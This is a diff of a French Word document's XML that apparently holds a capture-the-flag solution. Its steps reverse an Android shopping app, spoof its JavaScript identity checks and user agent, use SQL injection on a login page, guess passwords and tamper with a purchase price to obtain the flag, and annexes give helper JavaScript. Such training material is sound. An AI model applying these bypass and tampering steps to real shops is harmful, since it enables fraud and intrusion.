-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>inc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>pir</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>buyexpress</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>MainActivity.smali</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>"</w:t>
+        <w:t xml:space="preserve"> smali (apk-tool) ou en utilisant ghidra :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>Dans " appcustom\smali\inc\pir\buyexpress\MainActivity.smali"</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1731,15 +1091,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>désobfusquer</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> le javascript</w:t>
+        <w:t xml:space="preserve"> désobfusquer le javascript</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1751,31 +1103,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve"> constater que le </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>js</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> vérifie que l'objet Android, défini seulement sous </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>android</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">, existe et a deux propriétés : identification et </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>showToast</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> et qu'il met dans la variable id la valeur retournée par identification</w:t>
+        <w:t xml:space="preserve"> constater que le js vérifie que l'objet Android, défini seulement sous android, existe et a deux propriétés : identification et showToast et qu'il met dans la variable id la valeur retournée par identification</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1787,28 +1115,15 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve"> obtenir un code d'authentification généré aléatoirement par le serveur en effectuant une requête à : "</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
-        <w:t>index.php?</w:t>
+        <w:t>obtenir</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t>request</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>=</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>get_authentication_code</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>"</w:t>
+        <w:t xml:space="preserve"> un code d'authentification généré aléatoirement par le serveur en effectuant une requête à : "index.php?request=get_authentication_code"</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1820,63 +1135,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve"> retirer la partie qui effectue des appels à Android pour obtenir </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>l'id</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> et construire la valeur id en concaténant le hash sha256 du </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>token</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> obtenu via le reverse (fin du user agent) et le code d'authentification serveur obtenable avec une requête ajax (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> annexe 1 et 2). Il est également possible de placer des </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>breakpoints</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">. Par exemple, on peut placer un </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>breakpoint</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> au début du code pour créer un objet Android ayant les deux propriétés qui nous intéressent (identification et </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>showToast</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">) dans la console, et placer un </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>breakpoint</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> après l'affectation de id pour le mettre à jour avec la bonne valeur avec le code donné en annexe 2 par exemple. On remarque qu'il n'est pas possible d'affecter à Android la fonction identification qui retourne la bonne valeur de id car elle n'est pas asynchrone (contrairement à la requête ajax)</w:t>
+        <w:t xml:space="preserve"> retirer la partie qui effectue des appels à Android pour obtenir l'id et construire la valeur id en concaténant le hash sha256 du token obtenu via le reverse (fin du user agent) et le code d'authentification serveur obtenable avec une requête ajax (cf annexe 1 et 2). Il est également possible de placer des breakpoints. Par exemple, on peut placer un breakpoint au début du code pour créer un objet Android ayant les deux propriétés qui nous intéressent (identification et showToast) dans la console, et placer un breakpoint après l'affectation de id pour le mettre à jour avec la bonne valeur avec le code donné en annexe 2 par exemple. On remarque qu'il n'est pas possible d'affecter à Android la fonction identification qui retourne la bonne valeur de id car elle n'est pas asynchrone (contrairement à la requête ajax)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1889,23 +1148,15 @@
       </w:pPr>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve"> mettre </w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
-        <w:t>le user</w:t>
+        <w:t>mettre</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> agent de l'application obtenu lors de la phase de reverse (attention, le champs version du user agent change selon la version du site, la version est indiquée en commentaire en haut des fichiers html) (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> annexe 5)</w:t>
+        <w:t xml:space="preserve"> le user agent de l'application obtenu lors de la phase de reverse (attention, le champs version du user agent change selon la version du site, la version est indiquée en commentaire en haut des fichiers html) (cf annexe 5)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1917,23 +1168,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve"> faire une injection </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sql</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> sur la page de connexion du vieux site (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> annexe 3)</w:t>
+        <w:t xml:space="preserve"> faire une injection sql sur la page de connexion du vieux site (cf annexe 3)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1957,23 +1192,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve"> tester les combinaisons les plus évidentes, ça devrait être rapide (éviter les outils comme </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>crunch</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> et </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>john</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>) et connectez-vous sur le nouveau site</w:t>
+        <w:t xml:space="preserve"> tester les combinaisons les plus évidentes, ça devrait être rapide (éviter les outils comme crunch et john) et connectez-vous sur le nouveau site</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2009,23 +1228,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">modifier le javascript pour envoyer un prix nul et cliquer sur le bouton d'achat (une fenêtre de téléchargement du drapeau s'ouvre), ou envoyer directement une requête POST avec </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>curl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> ou tout autre outil (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> annexe 4)</w:t>
+        <w:t>modifier le javascript pour envoyer un prix nul et cliquer sur le bouton d'achat (une fenêtre de téléchargement du drapeau s'ouvre), ou envoyer directement une requête POST avec curl ou tout autre outil (cf annexe 4)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2053,62 +1256,23 @@
         <w:ind w:left="0"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">- annexe 1 : </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>hasher</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> le </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>token</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> en javascript (https seulement) :</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>const</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>token_str</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>- annexe 1 : hasher le token en javascript (https seulement) :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">const token_str = </w:t>
+      </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
@@ -2116,7 +1280,6 @@
         </w:rPr>
         <w:t>navigator.userAgent.slice</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
@@ -2133,47 +1296,11 @@
           <w:lang w:val="en-GB"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>const</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>token_bytes</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = new </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>TextEncoder</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>(</w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>const token_bytes = new TextEncoder(</w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -2187,89 +1314,153 @@
         <w:rPr>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>token_str</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>(token_str);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">const token_hash_buffer = await </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>crypto.subtle</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>.digest('SHA-256', token_bytes);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>const token_hash_bytes = Array.from(new Uint8Array(token_hash_buffer)</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-GB"/>
         </w:rPr>
         <w:t>);</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>const</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>token_hash_buffer</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = await </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">const token_hash_str = </w:t>
+      </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t>crypto.subtle</w:t>
+        <w:t>token_hash_bytes.map(</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t>.digest</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve">('SHA-256', </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>token_bytes</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>b =&gt; b.toString(16).padStart(2, '0')).join('');</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>id = user_agent_hash_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>str;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>- annexe 2 : obtenir le code aléatoire et régler l'id (hash en dur) :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">const ajax_auth = new </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>XMLHttpRequest(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-GB"/>
@@ -2285,360 +1476,54 @@
           <w:lang w:val="en-GB"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>const</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>token_hash_bytes</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>Array.from</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>(new Uint8Array(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>token_hash_buffer</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>)</w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>ajax_</w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t>);</w:t>
+        <w:t>auth.onreadystatechange</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>const</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>token_hash_str</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = () =&gt; {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t>token_hash_bytes.map</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>(</w:t>
+        <w:t>if(</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t xml:space="preserve">b =&gt; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>b.toString</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>(16).</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>padStart</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>(2, '0')).join('');</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve">id = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>user_agent_hash_</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>str</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="0"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">- annexe 2 : obtenir le code aléatoire et régler </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>l'id</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> (hash en dur) :</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>const</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>ajax_auth</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = new </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>XMLHttpRequest</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
